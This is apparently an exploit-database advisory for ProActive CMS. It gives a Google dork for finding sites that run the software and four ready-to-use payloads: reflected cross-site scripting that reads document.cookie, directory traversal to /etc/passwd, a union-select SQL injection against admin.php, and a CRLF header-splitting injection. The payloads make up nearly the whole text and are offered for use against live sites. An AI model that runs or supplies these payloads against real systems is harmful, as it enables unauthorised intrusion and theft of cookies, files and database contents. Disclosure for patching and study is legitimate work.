# Exploit Title: ProActive CMS Multiple Vulnerabilities
# Google Dork: intext:"Powered by Proactive CMS"
# Date: 12.1.2013
# Exploit Author: Mormoroth
# Vendor Homepage: http://www.proactivecms.com
# Tested on: Linux
---------Cross Site Scripting---------
index.php?action=search&q=1</title>1<script >alert(document.cookie)</script>
---------Directory Traversal----------
/lavate/cute.old/Dialogs/Tag.Frame.php?setting=&Style=../../../../../../../../../../etc/passwd.jpg&Tab=Style&Tag=&Theme=&UC=
---------SQL Injection----------------
admin.php?action=helpSWF&id=1/**/union/**/select/**/1,@@version,3,4/*
---------HTML Spilitting--------------
/index.php?action=verifimage&code=%0d%0a%20Inject Your Own Code
--------------------------------------
ISCN TEAM
http://blog.mormoroth.ir
http://ha.cker.ir
http://twitter.com/Mormoroth
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information